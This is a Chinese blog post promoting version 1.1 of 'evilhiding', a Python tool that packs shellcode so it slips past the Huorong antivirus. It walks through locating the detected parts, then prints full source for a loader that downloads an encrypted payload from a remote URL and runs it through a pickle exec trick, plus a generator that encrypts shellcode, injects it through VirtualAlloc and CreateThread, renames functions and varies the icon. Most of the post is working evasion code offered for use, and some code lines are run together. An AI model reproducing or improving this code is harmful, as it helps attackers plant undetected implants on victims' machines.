文章目录
- 前记
- 查杀排查
- 源码修改
- 免杀效果测试
前记
evilhiding昨天被提issue不能绕过火绒了,于是今天更新了evilhiding v1.1,已经可以继续免杀了。
期待各位的stars,项目地址如下:
https://github.com/coleak2021/evilhiding
查杀排查
直接python运行b.py发现未被查杀,且可正常上线,但是通过pyinstaller打包为exe后发现被火绒查杀,因此打算对源代码进行修改来绕过火绒
于是对b.py关键部分分别打包检查,发现均未被查杀
加载器
import pickle,base64,requests,ctypes
from cryptography.fernet import Ferneturl=''
def O7867890(sectr):KEY=b'Lo8QurfIObo62aKQsQjnzAocsnrrIkTsJewRJLLKAsA='fernet = Fernet(KEY)destr = fernet.decrypt(sectr).decode()class A(object):def __reduce__(self):return (exec, (destr,))ret = pickle.dumps(A())ret_base64 = base64.b64encode(ret)ret_decode = base64.b64decode(ret_base64)pickle.loads(ret_decode)执行器
def O1674418():try:r=requests.get(url)a = r.status_codeexcept:a = 404passif a == 200:O7867890(r.text)else:passif __name__ == '__main__':exec(t1)exec(t2)O1674418()
花指令
t2 ="""
import base64st= 'wo gan jue wo ma shang jiu yao bei defender gan diao a ba a bachonogchong chongcong!'.encode()
res= base64.b64encode(st)
aaa= res.decode()
res= base64.b64decode(res)
bbb= res.decode()"""t1 ="""
import randomdef O4402217(test_arr, low, high):i = (low - 1) pivot = test_arr[high]for j in range(low, high):if test_arr[j] <= pivot:i = i + 1test_arr[i], test_arr[j] = test_arr[j], test_arr[i]test_arr[i + 1], test_arr[high] = test_arr[high], test_arr[i + 1]return i + 1def O7313740(test_arr, low, high):if low < high:pi = O4402217(test_arr, low, high)O7313740(test_arr, low, pi - 1)O7313740(test_arr, pi + 1, high)test_arr= []
for i in range(59999):test_arr.append(random.random())
n= len(test_arr)
O7313740(test_arr,0, n - 1)"""
得出结论:各部分可以分别正常打包,但是火绒对整体进行了特征提取,因此我们只需要将文件结构做修改即可
源码修改
经过测试,最终对b.py修改为如下,此时打包为exe可绕过火绒正常上线
from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import randomurl=''
def O7867890(sectr):KEY=b''fernet = Fernet(KEY)destr = fernet.decrypt(sectr).decode()class A(object):def __reduce__(self):return (exec, (destr,))def say_hello(self):exec(bbb)a=A()a.say_hello()ret = pickle.dumps(a)ret_base64 = base64.b64encode(ret)ret_decode = base64.b64decode(ret_base64)pickle.loads(ret_decode)bbb ="""
import base64
st= 'cccccccccccccccccccooooooooooollllllllllllleeeeeeeeeeeeaaaaaaaaaaaakkkkkkkkk'.encode()
res= base64.b64encode(st)
aaa= res.decode()
res= base64.b64decode(res)
bbb= res.decode()"""def O1674418():try:r=requests.get(url)a = r.status_codeexcept:a = 404passif a == 200:O7867890(r.text)else:passif __name__ == '__main__':O1674418()
因此,对main.py生成器修改如下
# -*- coding: utf-8 -*-import base64
import re,os,time
from cryptography.fernet import Fernetshellcode = b""
url=''
key = Fernet.generate_key()
fernet = Fernet(key)
enstr = fernet.encrypt(shellcode)
key2 = Fernet.generate_key()
fernet2 = Fernet(key2)
a=f'''
import ctypes
from cryptography.fernet import Fernet
KEY={key}
fernet=Fernet(KEY)
shellcode=fernet.decrypt({enstr})shellcode = bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode))
)
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0))
)
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
'''cccc=f'''
from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import random
url=f'{url}'
a=[]
class B():def cc(self):for i in range(5):a.append(i)def O7303771(sectr):global destrKEY={key2}fernet = Fernet(KEY)destr = fernet.decrypt(sectr).decode()aaa(destr)def aaa(destr):class A(object):def __reduce__(self):return (exec, (destr,))def O6294286(self):exec(bbb)a=A()a.O6294286()ret = pickle.dumps(a)ret_base64 = base64.b64encode(ret)ret_decode = base64.b64decode(ret_base64)pickle.loads(ret_decode)bbb ="""
for i in range(100):aaa=B()aaa.cc()"""def O0135984():try:r=requests.get(url)a = r.status_codeexcept:a = 404passif a == 200:O7303771(r.text)else:pass
if __name__ == '__main__':O0135984()
'''def hunxiao():openfile = 'content.txt'text = open(openfile, encoding='utf-8').read()wd_df = re.findall("def (.*?)\\(", text)wd_df = list(set(wd_df))for i in wd_df:if i[0:2] == "__":wd_df.remove(i)if i == 'super':wd_df.remove(i)idlist = []for i in wd_df:idlist.append('O' + str(hash(i))[-7:])cs = len(wd_df)if cs == len(set(idlist)):while cs > 0:cs -= 1text = text.replace(wd_df[cs] + '(', idlist[cs] + '(')text = text.replace('target=' + wd_df[cs], 'target=' + idlist[cs])text = text.replace('global ' + wd_df[cs], 'global ' + idlist[cs])text = text.replace(', ' + wd_df[cs], ', ' + idlist[cs])else:print('hash repeat')file_save = open('b.py', 'w', encoding='utf-8')file_save.write(text)file_save.close()with open('content.txt', 'bw') as f:f.write(cccc.encode())hunxiao()with open('a.txt', 'bw') as f:f.write(fernet2.encrypt(a.encode()))with open('content.txt', 'br') as f:content=base64.b64encode(f.read())b = f'''
from cryptography.fernet import Fernet
import pickle,base64,requests,ctypes
import random
cccc={content}
exec(base64.b64decode(cccc).decode())
'''with open('b.py', 'w', encoding='utf-8') as f:f.write(b)iconame=f'{int (time.time() *1000)}.ico'
with open('coleak.ico',"br") as f:cont=f.read()
with open(f'{iconame}',"bw") as f:cont+=iconame.encode()f.write(cont)
with open('create.py',"br") as f:createit=f.read()
exec(createit)
免杀效果测试
